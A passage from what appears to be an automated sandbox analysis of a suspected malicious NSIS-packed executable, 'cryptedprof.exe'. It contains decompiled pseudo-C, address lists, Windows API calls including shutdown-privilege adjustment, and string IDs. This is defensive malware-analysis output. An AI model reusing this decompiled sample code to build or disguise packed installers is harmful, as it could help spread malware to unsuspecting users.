                                                                                        								}
                                                                                        								goto L23;
                                                                                        							}
                                                                                        							_t142 = _t55[1];
                                                                                        							__eflags = _t142 - 0x20;
                                                                                        							if(_t142 == 0x20) {
                                                                                        								L19:
                                                                                        								 *0x42f500 = 1;
                                                                                        								goto L20;
                                                                                        							}
                                                                                        							__eflags = _t142;
                                                                                        							if(_t142 != 0) {
                                                                                        								goto L20;
                                                                                        							}
                                                                                        							goto L19;
                                                                                        						}
                                                                                        					} else {
                                                                                        						goto L12;
                                                                                        					}
                                                                                        					do {
                                                                                        						L12:
                                                                                        						_t55 =  &(_t55[1]);
                                                                                        						__eflags =  *_t55 - 0x20;
                                                                                        					} while ( *_t55 == 0x20);
                                                                                        					goto L13;
                                                                                        				}
                                                                                        				goto L30;
                                                                                        			}

































                                                                                        0x004038f5
                                                                                        0x00403902
                                                                                        0x00403915
                                                                                        0x0040391d
                                                                                        0x00403921
                                                                                        0x00403921
                                                                                        0x00403929
                                                                                        0x0040392e
                                                                                        0x00403935
                                                                                        0x00403943
                                                                                        0x00403945
                                                                                        0x0040394b
                                                                                        0x0040394d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403937
                                                                                        0x0040393d
                                                                                        0x0040393f
                                                                                        0x00403941
                                                                                        0x0040394f
                                                                                        0x00403951
                                                                                        0x00000000
                                                                                        0x00403951
                                                                                        0x00000000
                                                                                        0x00403941
                                                                                        0x00403935
                                                                                        0x004037bf
                                                                                        0x004037c6
                                                                                        0x004037c6
                                                                                        0x00403718
                                                                                        0x00403790
                                                                                        0x00403790
                                                                                        0x0040379c
                                                                                        0x00000000
                                                                                        0x0040379c
                                                                                        0x00403721
                                                                                        0x00403725
                                                                                        0x0040375b
                                                                                        0x0040375b
                                                                                        0x0040375d
                                                                                        0x00403765
                                                                                        0x004037d7
                                                                                        0x004037d9
                                                                                        0x004037e0
                                                                                        0x004037e8
                                                                                        0x004037e8
                                                                                        0x004037f3
                                                                                        0x004037f8
                                                                                        0x00403807
                                                                                        0x0040380b
                                                                                        0x0040380c
                                                                                        0x00403815
                                                                                        0x0040380e
                                                                                        0x0040380e
                                                                                        0x0040380e
                                                                                        0x0040381b
                                                                                        0x00403821
                                                                                        0x00403827
                                                                                        0x0040382f
                                                                                        0x0040382f
                                                                                        0x0040383d
                                                                                        0x00403842
                                                                                        0x00403854
                                                                                        0x0040385c
                                                                                        0x00403862
                                                                                        0x0040386e
                                                                                        0x00403874
                                                                                        0x0040387e
                                                                                        0x00403894
                                                                                        0x004038a5
                                                                                        0x004038ab
                                                                                        0x004038b2
                                                                                        0x004038b5
                                                                                        0x004038bb
                                                                                        0x004038bb
                                                                                        0x004038b2
                                                                                        0x004038bf
                                                                                        0x004038c5
                                                                                        0x004038c5
                                                                                        0x004038ca
                                                                                        0x004038ca
                                                                                        0x00000000
                                                                                        0x00403807
                                                                                        0x00403767
                                                                                        0x00403769
                                                                                        0x00403774
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040377c
                                                                                        0x00403787
                                                                                        0x0040378c
                                                                                        0x00000000
                                                                                        0x0040378c
                                                                                        0x00403750
                                                                                        0x00403752
                                                                                        0x00403756
                                                                                        0x00403759
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403759
                                                                                        0x00000000
                                                                                        0x00403752
                                                                                        0x004036a2
                                                                                        0x004036ae
                                                                                        0x004036b3
                                                                                        0x004036b8
                                                                                        0x004036ba
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004036c2
                                                                                        0x004036ca
                                                                                        0x004036db
                                                                                        0x004036e3
                                                                                        0x004036e5
                                                                                        0x004036ea
                                                                                        0x004036ec
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004036ec
                                                                                        0x00000000
                                                                                        0x00403651
                                                                                        0x00403612
                                                                                        0x00403615
                                                                                        0x00403618
                                                                                        0x0040361e
                                                                                        0x0040361e
                                                                                        0x0040361e
                                                                                        0x0040361e
                                                                                        0x00000000
                                                                                        0x0040361e
                                                                                        0x0040361a
                                                                                        0x0040361c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040361c
                                                                                        0x004035cd
                                                                                        0x004035d0
                                                                                        0x004035d3
                                                                                        0x004035d9
                                                                                        0x004035d9
                                                                                        0x00000000
                                                                                        0x004035d9
                                                                                        0x004035d5
                                                                                        0x004035d7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004035d7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004035a8
                                                                                        0x004035a8
                                                                                        0x004035a8
                                                                                        0x004035a9
                                                                                        0x004035a9
                                                                                        0x00000000
                                                                                        0x004035a8
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE ref: 004034AB
                                                                                        • GetVersion.KERNEL32 ref: 004034B1
                                                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034E4
                                                                                        • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403520
                                                                                        • OleInitialize.OLE32(00000000), ref: 00403527
                                                                                        • SHGetFileInfoA.SHELL32(00429878,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403543
                                                                                        • GetCommandLineA.KERNEL32(Setup Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00403558
                                                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\cryptedprof.exe" ,00000020,"C:\Users\user\Desktop\cryptedprof.exe" ,00000000,?,00000007,00000009,0000000B), ref: 00403594
                                                                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403691
                                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036A2
                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036AE
                                                                                        • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 004036C2
                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036CA
                                                                                        • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036DB
                                                                                        • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036E3
                                                                                        • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004036F7
                                                                                          • Part of subcall function 00406656: GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                                                          • Part of subcall function 00406656: GetProcAddress.KERNEL32(00000000,?), ref: 00406683
                                                                                          • Part of subcall function 00403A60: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,747DFA90), ref: 00403B50
                                                                                          • Part of subcall function 00403A60: lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000), ref: 00403B63
                                                                                          • Part of subcall function 00403A60: GetFileAttributesA.KERNEL32(Call), ref: 00403B6E
                                                                                          • Part of subcall function 00403A60: LoadImageA.USER32 ref: 00403BB7
                                                                                          • Part of subcall function 00403A60: RegisterClassA.USER32 ref: 00403BF4
                                                                                          • Part of subcall function 0040396E: CloseHandle.KERNEL32(000002C8,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403980
                                                                                          • Part of subcall function 0040396E: CloseHandle.KERNEL32(000002A8,C:\Users\user\AppData\Local\Temp\,004037A5,?,?,00000007,00000009,0000000B), ref: 00403994
                                                                                        • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 004037A5
                                                                                        • ExitProcess.KERNEL32 ref: 004037C6
                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038E3
                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004038EA
                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403902
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403921
                                                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403945
                                                                                        • ExitProcess.KERNEL32 ref: 00403968
                                                                                          • Part of subcall function 00405969: MessageBoxIndirectA.USER32(0040A230), ref: 004059C4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Process$ExitFileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                                        • String ID: "$"C:\Users\user\Desktop\cryptedprof.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\cryptedprof.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$Setup Setup$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 95%
                                                                                        			E70991A98() {
                                                                                        				signed int _v8;
                                                                                        				signed int _v12;
                                                                                        				signed int _v16;
                                                                                        				signed int _v20;
                                                                                        				CHAR* _v24;
                                                                                        				CHAR* _v28;
                                                                                        				signed int _v32;
                                                                                        				signed int _v36;
                                                                                        				signed int _v40;
                                                                                        				signed int _v44;
                                                                                        				CHAR* _v48;
                                                                                        				signed int _v52;
                                                                                        				void* _v56;
                                                                                        				intOrPtr _v60;
                                                                                        				CHAR* _t207;
                                                                                        				signed int _t210;
                                                                                        				void* _t212;
                                                                                        				void* _t214;
                                                                                        				CHAR* _t216;
                                                                                        				void* _t224;
                                                                                        				struct HINSTANCE__* _t225;
                                                                                        				struct HINSTANCE__* _t226;
                                                                                        				struct HINSTANCE__* _t228;
                                                                                        				signed short _t230;
                                                                                        				struct HINSTANCE__* _t233;
                                                                                        				struct HINSTANCE__* _t235;
                                                                                        				void* _t236;
                                                                                        				char* _t237;
                                                                                        				void* _t248;
                                                                                        				signed char _t249;
                                                                                        				signed int _t250;
                                                                                        				void* _t254;
                                                                                        				struct HINSTANCE__* _t256;
                                                                                        				void* _t257;
                                                                                        				signed int _t259;
                                                                                        				intOrPtr _t260;
                                                                                        				char* _t263;
                                                                                        				signed int _t268;
                                                                                        				signed int _t271;
                                                                                        				signed int _t273;
                                                                                        				void* _t276;
                                                                                        				void* _t280;
                                                                                        				struct HINSTANCE__* _t282;
                                                                                        				intOrPtr _t285;
                                                                                        				void _t286;
                                                                                        				signed int _t287;
                                                                                        				signed int _t299;
                                                                                        				signed int _t300;
                                                                                        				intOrPtr _t303;
                                                                                        				void* _t304;
                                                                                        				signed int _t308;
                                                                                        				signed int _t311;
                                                                                        				signed int _t314;
                                                                                        				signed int _t315;
                                                                                        				signed int _t316;
                                                                                        				intOrPtr _t319;
                                                                                        				intOrPtr* _t320;
                                                                                        				CHAR* _t321;
                                                                                        				CHAR* _t323;
                                                                                        				CHAR* _t324;
                                                                                        				struct HINSTANCE__* _t325;
                                                                                        				void* _t327;
                                                                                        				signed int _t328;
                                                                                        				void* _t329;
                                                                                        
                                                                                        				_t282 = 0;
                                                                                        				_v32 = 0;
                                                                                        				_v36 = 0;
                                                                                        				_v16 = 0;
                                                                                        				_v8 = 0;
                                                                                        				_v40 = 0;
                                                                                        				_t329 = 0;
                                                                                        				_v52 = 0;
                                                                                        				_v44 = 0;
                                                                                        				_t207 = E70991215();
                                                                                        				_v24 = _t207;
                                                                                        				_v28 = _t207;
                                                                                        				_v48 = E70991215();
                                                                                        				_t320 = E7099123B();
                                                                                        				_v56 = _t320;
                                                                                        				_v12 = _t320;
                                                                                        				while(1) {
                                                                                        					_t210 = _v32;
                                                                                        					_v60 = _t210;
                                                                                        					if(_t210 != _t282 && _t329 == _t282) {
                                                                                        						break;
                                                                                        					}
                                                                                        					_t319 =  *_t320;
                                                                                        					_t285 = _t319;
                                                                                        					_t212 = _t285 - _t282;
                                                                                        					if(_t212 == 0) {
                                                                                        						_t37 =  &_v32;
                                                                                        						 *_t37 = _v32 | 0xffffffff;
                                                                                        						__eflags =  *_t37;
                                                                                        						L20:
                                                                                        						_t214 = _v60 - _t282;
                                                                                        						if(_t214 == 0) {
                                                                                        							 *_v28 =  *_v28 & 0x00000000;
                                                                                        							__eflags = _t329 - _t282;
                                                                                        							if(_t329 == _t282) {
                                                                                        								_t254 = GlobalAlloc(0x40, 0x14a4); // executed
                                                                                        								_t329 = _t254;
                                                                                        								 *(_t329 + 0x810) = _t282;
                                                                                        								 *(_t329 + 0x814) = _t282;
                                                                                        							}
                                                                                        							_t286 = _v36;
                                                                                        							_t47 = _t329 + 8; // 0x8
                                                                                        							_t216 = _t47;
                                                                                        							_t48 = _t329 + 0x408; // 0x408
                                                                                        							_t321 = _t48;
                                                                                        							 *_t329 = _t286;
                                                                                        							 *_t216 =  *_t216 & 0x00000000;
                                                                                        							 *(_t329 + 0x808) = _t282;
                                                                                        							 *_t321 =  *_t321 & 0x00000000;
                                                                                        							_t287 = _t286 - _t282;
                                                                                        							__eflags = _t287;
                                                                                        							 *(_t329 + 0x80c) = _t282;
                                                                                        							 *(_t329 + 4) = _t282;
                                                                                        							if(_t287 == 0) {
                                                                                        								__eflags = _v28 - _v24;
                                                                                        								if(_v28 == _v24) {
                                                                                        									goto L42;
                                                                                        								}
                                                                                        								_t327 = 0;
                                                                                        								GlobalFree(_t329);
                                                                                        								_t329 = E709912FE(_v24);
                                                                                        								__eflags = _t329 - _t282;
                                                                                        								if(_t329 == _t282) {
                                                                                        									goto L42;
                                                                                        								} else {
                                                                                        									goto L35;
                                                                                        								}
                                                                                        								while(1) {
                                                                                        									L35:
                                                                                        									_t248 =  *(_t329 + 0x14a0);
                                                                                        									__eflags = _t248 - _t282;
                                                                                        									if(_t248 == _t282) {
                                                                                        										break;
                                                                                        									}
                                                                                        									_t327 = _t329;
                                                                                        									_t329 = _t248;
                                                                                        									__eflags = _t329 - _t282;
                                                                                        									if(_t329 != _t282) {
                                                                                        										continue;
                                                                                        									}
                                                                                        									break;
                                                                                        								}
                                                                                        								__eflags = _t327 - _t282;
                                                                                        								if(_t327 != _t282) {
                                                                                        									 *(_t327 + 0x14a0) = _t282;
                                                                                        								}
                                                                                        								_t249 =  *(_t329 + 0x810);
                                                                                        								__eflags = _t249 & 0x00000008;
                                                                                        								if((_t249 & 0x00000008) == 0) {
                                                                                        									_t250 = _t249 | 0x00000002;
                                                                                        									__eflags = _t250;
                                                                                        									 *(_t329 + 0x810) = _t250;
                                                                                        								} else {
                                                                                        									_t329 = E70991534(_t329);
                                                                                        									 *(_t329 + 0x810) =  *(_t329 + 0x810) & 0xfffffff5;
                                                                                        								}
                                                                                        								goto L42;
                                                                                        							} else {
                                                                                        								_t299 = _t287 - 1;
                                                                                        								__eflags = _t299;
                                                                                        								if(_t299 == 0) {
                                                                                        									L31:
                                                                                        									lstrcpyA(_t216, _v48);
                                                                                        									L32:
                                                                                        									lstrcpyA(_t321, _v24);
                                                                                        									goto L42;
                                                                                        								}
                                                                                        								_t300 = _t299 - 1;
                                                                                        								__eflags = _t300;
                                                                                        								if(_t300 == 0) {
                                                                                        									goto L32;
                                                                                        								}
                                                                                        								__eflags = _t300 != 1;
                                                                                        								if(_t300 != 1) {
                                                                                        									goto L42;
                                                                                        								}
                                                                                        								goto L31;
                                                                                        							}
                                                                                        						} else {
                                                                                        							if(_t214 == 1) {
                                                                                        								_t256 = _v16;
                                                                                        								if(_v40 == _t282) {
                                                                                        									_t256 = _t256 - 1;
                                                                                        								}
                                                                                        								 *(_t329 + 0x814) = _t256;
                                                                                        							}
                                                                                        							L42:
                                                                                        							_v12 = _v12 + 1;
                                                                                        							_v28 = _v24;
                                                                                        							L59:
                                                                                        							if(_v32 != 0xffffffff) {
                                                                                        								_t320 = _v12;
                                                                                        								continue;
                                                                                        							}
                                                                                        							break;
                                                                                        						}
                                                                                        					}
                                                                                        					_t257 = _t212 - 0x23;
                                                                                        					if(_t257 == 0) {
                                                                                        						__eflags = _t320 - _v56;
                                                                                        						if(_t320 <= _v56) {
                                                                                        							L17:
                                                                                        							__eflags = _v44 - _t282;
                                                                                        							if(_v44 != _t282) {
                                                                                        								L43:
                                                                                        								_t259 = _v32 - _t282;
                                                                                        								__eflags = _t259;
                                                                                        								if(_t259 == 0) {
                                                                                        									_t260 = _t319;
                                                                                        									while(1) {
                                                                                        										__eflags = _t260 - 0x22;
                                                                                        										if(_t260 != 0x22) {
                                                                                        											break;
                                                                                        										}
                                                                                        										_t320 = _t320 + 1;
                                                                                        										__eflags = _v44 - _t282;
                                                                                        										_v12 = _t320;
                                                                                        										if(_v44 == _t282) {
                                                                                        											_v44 = 1;
                                                                                        											L162:
                                                                                        											_v28 =  &(_v28[1]);
                                                                                        											 *_v28 =  *_t320;
                                                                                        											L58:
                                                                                        											_t328 = _t320 + 1;
                                                                                        											__eflags = _t328;
                                                                                        											_v12 = _t328;
                                                                                        											goto L59;
                                                                                        										}
                                                                                        										_t260 =  *_t320;
                                                                                        										_v44 = _t282;
                                                                                        									}
                                                                                        									__eflags = _t260 - 0x2a;
                                                                                        									if(_t260 == 0x2a) {
                                                                                        										_v36 = 2;
                                                                                        										L57:
                                                                                        										_t320 = _v12;
                                                                                        										_v28 = _v24;
                                                                                        										_t282 = 0;
                                                                                        										__eflags = 0;
                                                                                        										goto L58;
                                                                                        									}
                                                                                        									__eflags = _t260 - 0x2d;
                                                                                        									if(_t260 == 0x2d) {
                                                                                        										L151:
                                                                                        										_t303 =  *_t320;
                                                                                        										__eflags = _t303 - 0x2d;
                                                                                        										if(_t303 != 0x2d) {
                                                                                        											L154:
                                                                                        											_t263 = _t320 + 1;
                                                                                        											__eflags =  *_t263 - 0x3a;
                                                                                        											if( *_t263 != 0x3a) {
                                                                                        												goto L162;
                                                                                        											}
                                                                                        											__eflags = _t303 - 0x2d;
                                                                                        											if(_t303 == 0x2d) {
                                                                                        												goto L162;
                                                                                        											}
                                                                                        											_v36 = 1;
                                                                                        											L157:
                                                                                        											_v12 = _t263;
                                                                                        											__eflags = _v28 - _v24;
                                                                                        											if(_v28 <= _v24) {
                                                                                        												 *_v48 =  *_v48 & 0x00000000;
                                                                                        											} else {
                                                                                        												 *_v28 =  *_v28 & 0x00000000;
                                                                                        												lstrcpyA(_v48, _v24);
                                                                                        											}
                                                                                        											goto L57;
                                                                                        										}
                                                                                        										_t263 = _t320 + 1;
                                                                                        										__eflags =  *_t263 - 0x3e;
                                                                                        										if( *_t263 != 0x3e) {
                                                                                        											goto L154;
                                                                                        										}
                                                                                        										_v36 = 3;
                                                                                        										goto L157;
                                                                                        									}
                                                                                        									__eflags = _t260 - 0x3a;
                                                                                        									if(_t260 != 0x3a) {
                                                                                        										goto L162;
                                                                                        									}
                                                                                        									goto L151;
                                                                                        								}
                                                                                        								_t268 = _t259 - 1;
                                                                                        								__eflags = _t268;
                                                                                        								if(_t268 == 0) {
                                                                                        									L80:
                                                                                        									_t304 = _t285 + 0xffffffde;
                                                                                        									__eflags = _t304 - 0x55;
                                                                                        									if(_t304 > 0x55) {
                                                                                        										goto L57;
                                                                                        									}
                                                                                        									switch( *((intOrPtr*)(( *(_t304 + 0x70992259) & 0x000000ff) * 4 +  &M709921CD))) {
                                                                                        										case 0:
                                                                                        											__eax = _v24;
                                                                                        											__edi = _v12;
                                                                                        											while(1) {
                                                                                        												__edi = __edi + 1;
                                                                                        												_v12 = __edi;
                                                                                        												__cl =  *__edi;
                                                                                        												__eflags = __cl - __dl;
                                                                                        												if(__cl != __dl) {
                                                                                        													goto L132;
                                                                                        												}
                                                                                        												L131:
                                                                                        												__eflags =  *(__edi + 1) - __dl;
                                                                                        												if( *(__edi + 1) != __dl) {
                                                                                        													L136:
                                                                                        													 *__eax =  *__eax & 0x00000000;
                                                                                        													__eax = E70991224(_v24);
                                                                                        													__ebx = __eax;
                                                                                        													goto L97;
                                                                                        												}
                                                                                        												L132:
                                                                                        												__eflags = __cl;
                                                                                        												if(__cl == 0) {
                                                                                        													goto L136;
                                                                                        												}
                                                                                        												__eflags = __cl - __dl;
                                                                                        												if(__cl == __dl) {
                                                                                        													__edi = __edi + 1;
                                                                                        													__eflags = __edi;
                                                                                        												}
                                                                                        												__cl =  *__edi;
                                                                                        												 *__eax =  *__edi;
                                                                                        												__eax = __eax + 1;
                                                                                        												__edi = __edi + 1;
                                                                                        												_v12 = __edi;
                                                                                        												__cl =  *__edi;
                                                                                        												__eflags = __cl - __dl;
                                                                                        												if(__cl != __dl) {
                                                                                        													goto L132;
                                                                                        												}
                                                                                        												goto L131;
                                                                                        											}
                                                                                        										case 1:
                                                                                        											_v8 = 1;
                                                                                        											goto L57;
                                                                                        										case 2:
                                                                                        											_v8 = _v8 | 0xffffffff;
                                                                                        											goto L57;
                                                                                        										case 3:
                                                                                        											_v8 = _v8 & 0x00000000;
                                                                                        											_v20 = _v20 & 0x00000000;
                                                                                        											_v16 = _v16 + 1;
                                                                                        											goto L85;
                                                                                        										case 4:
                                                                                        											__eflags = _v20;
                                                                                        											if(_v20 != 0) {
                                                                                        												goto L57;
                                                                                        											}
                                                                                        											_v12 = _v12 - 1;
                                                                                        											__ebx = E70991215();
                                                                                        											 &_v12 = E70991A36( &_v12);
                                                                                        											__eax = E70991429(__edx, __eax, __edx, __ebx);
                                                                                        											goto L97;
                                                                                        										case 5:
                                                                                        											L105:
                                                                                        											_v20 = _v20 + 1;
                                                                                        											goto L57;
                                                                                        										case 6:
                                                                                        											_push(7);
                                                                                        											goto L123;
                                                                                        										case 7:
                                                                                        											_push(0x19);
                                                                                        											goto L143;
                                                                                        										case 8:
                                                                                        											__eax = 0;
                                                                                        											__eax = 1;
                                                                                        											__eflags = 1;
                                                                                        											goto L107;
                                                                                        										case 9:
                                                                                        											_push(0x15);
                                                                                        											goto L143;
                                                                                        										case 0xa:
                                                                                        											_push(0x16);
                                                                                        											goto L143;
                                                                                        										case 0xb:
                                                                                        											_push(0x18);
                                                                                        											goto L143;
                                                                                        										case 0xc:
                                                                                        											__eax = 0;
                                                                                        											__eax = 1;
                                                                                        											__eflags = 1;
                                                                                        											goto L118;
                                                                                        										case 0xd:
                                                                                        											__eax = 0;
                                                                                        											__eax = 1;
                                                                                        											__eflags = 1;
                                                                                        											goto L109;
                                                                                        										case 0xe:
                                                                                        											__eax = 0;
                                                                                        											__eax = 1;
                                                                                        											__eflags = 1;
                                                                                        											goto L111;
                                                                                        										case 0xf:
                                                                                        											__eax = 0;
                                                                                        											__eax = 1;
                                                                                        											__eflags = 1;
                                                                                        											goto L122;
                                                                                        										case 0x10:
                                                                                        											__eax = 0;
                                                                                        											__eax = 1;
                                                                                        											__eflags = 1;
                                                                                        											goto L113;
                                                                                        										case 0x11:
                                                                                        											_push(3);
                                                                                        											goto L123;
                                                                                        										case 0x12:
                                                                                        											_push(0x17);
                                                                                        											L143:
                                                                                        											_pop(__ebx);
                                                                                        											goto L98;
                                                                                        										case 0x13:
                                                                                        											__eax =  &_v12;
                                                                                        											__eax = E70991A36( &_v12);
                                                                                        											__ebx = __eax;
                                                                                        											__ebx = __eax + 1;
                                                                                        											__eflags = __ebx - 0xb;
                                                                                        											if(__ebx < 0xb) {
                                                                                        												__ebx = __ebx + 0xa;
                                                                                        											}
                                                                                        											goto L97;
                                                                                        										case 0x14:
                                                                                        											__ebx = 0xffffffff;
                                                                                        											goto L98;
                                                                                        										case 0x15:
                                                                                        											__eax = 0;
                                                                                        											__eflags = 0;
                                                                                        											goto L116;
                                                                                        										case 0x16:
                                                                                        											__ecx = 0;
                                                                                        											__eflags = 0;
                                                                                        											goto L91;
                                                                                        										case 0x17:
                                                                                        											__eax = 0;
                                                                                        											__eax = 1;
                                                                                        											__eflags = 1;
                                                                                        											goto L120;
                                                                                        										case 0x18:
                                                                                        											_t270 =  *(_t329 + 0x814);
                                                                                        											__eflags = _t270 - _v16;
                                                                                        											if(_t270 > _v16) {
                                                                                        												_v16 = _t270;
                                                                                        											}
                                                                                        											_v8 = _v8 & 0x00000000;
                                                                                        											_v20 = _v20 & 0x00000000;
                                                                                        											_v36 - 3 = _t270 - (_v36 == 3);
                                                                                        											if(_t270 != _v36 == 3) {
                                                                                        												L85:
                                                                                        												_v40 = 1;
                                                                                        											}
                                                                                        											goto L57;
                                                                                        										case 0x19:
                                                                                        											L107:
                                                                                        											__ecx = 0;
                                                                                        											_v8 = 2;
                                                                                        											__ecx = 1;
                                                                                        											goto L91;
                                                                                        										case 0x1a:
                                                                                        											L118:
                                                                                        											_push(5);
                                                                                        											goto L123;
                                                                                        										case 0x1b:
                                                                                        											L109:
                                                                                        											__ecx = 0;
                                                                                        											_v8 = 3;
                                                                                        											__ecx = 1;
                                                                                        											goto L91;
                                                                                        										case 0x1c:
                                                                                        											L111:
                                                                                        											__ecx = 0;
                                                                                        											__ecx = 1;
                                                                                        											goto L91;
                                                                                        										case 0x1d:
                                                                                        											L122:
                                                                                        											_push(6);
                                                                                        											goto L123;
                                                                                        										case 0x1e:
                                                                                        											L113:
                                                                                        											_push(2);
                                                                                        											goto L123;
                                                                                        										case 0x1f:
                                                                                        											__eax =  &_v12;
                                                                                        											__eax = E70991A36( &_v12);
                                                                                        											__ebx = __eax;
                                                                                        											__ebx = __eax + 1;
                                                                                        											goto L97;
                                                                                        										case 0x20:
                                                                                        											L116:
                                                                                        											_v52 = _v52 + 1;
                                                                                        											_push(3);
                                                                                        											_pop(__ecx);
                                                                                        											goto L91;
                                                                                        										case 0x21:
                                                                                        											L120:
                                                                                        											_push(4);
                                                                                        											L123:
                                                                                        											_pop(__ecx);
                                                                                        											L91:
                                                                                        											__edi = _v16;
                                                                                        											__edx =  *(0x7099305c + __ecx * 4);
                                                                                        											__eax =  ~__eax;
                                                                                        											asm("sbb eax, eax");
                                                                                        											_v40 = 1;
                                                                                        											__edi = _v16 << 5;
                                                                                        											__eax = __eax & 0x00008000;
                                                                                        											__edi = (_v16 << 5) + __esi;
                                                                                        											__eax = __eax | __ecx;
                                                                                        											__eflags = _v8;
                                                                                        											 *(__edi + 0x818) = __eax;
                                                                                        											if(_v8 < 0) {
                                                                                        												L93:
                                                                                        												__edx = 0;
                                                                                        												__edx = 1;
                                                                                        												__eflags = 1;
                                                                                        												L94:
                                                                                        												__eflags = _v8 - 1;
                                                                                        												 *(__edi + 0x828) = __edx;
                                                                                        												if(_v8 == 1) {
                                                                                        													__eax =  &_v12;
                                                                                        													__eax = E70991A36( &_v12);
                                                                                        													__eax = __eax + 1;
                                                                                        													__eflags = __eax;
                                                                                        													_v8 = __eax;
                                                                                        												}
                                                                                        												__eax = _v8;
                                                                                        												 *((intOrPtr*)(__edi + 0x81c)) = _v8;
                                                                                        												_t136 = _v16 + 0x41; // 0x41
                                                                                        												_t136 = _t136 << 5;
                                                                                        												__eax = 0;
                                                                                        												__eflags = 0;
                                                                                        												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
                                                                                        												 *((intOrPtr*)(__edi + 0x830)) = 0;
                                                                                        												 *((intOrPtr*)(__edi + 0x82c)) = 0;
                                                                                        												L97:
                                                                                        												__eflags = __ebx;
                                                                                        												if(__ebx == 0) {
                                                                                        													goto L57;
                                                                                        												}
                                                                                        												L98:
                                                                                        												__eflags = _v20;
                                                                                        												_v40 = 1;
                                                                                        												if(_v20 != 0) {
                                                                                        													L103:
                                                                                        													__eflags = _v20 - 1;
                                                                                        													if(_v20 == 1) {
                                                                                        														__eax = _v16;
                                                                                        														__eax = _v16 << 5;
                                                                                        														__eflags = __eax;
                                                                                        														 *(__eax + __esi + 0x82c) = __ebx;
                                                                                        													}
                                                                                        													goto L105;
                                                                                        												}
                                                                                        												_v16 = _v16 << 5;
                                                                                        												_t144 = __esi + 0x830; // 0x830
                                                                                        												__edi = (_v16 << 5) + _t144;
                                                                                        												__eax =  *__edi;
                                                                                        												__eflags = __eax - 0xffffffff;
                                                                                        												if(__eax <= 0xffffffff) {
                                                                                        													L101:
                                                                                        													__eax = GlobalFree(__eax);
                                                                                        													L102:
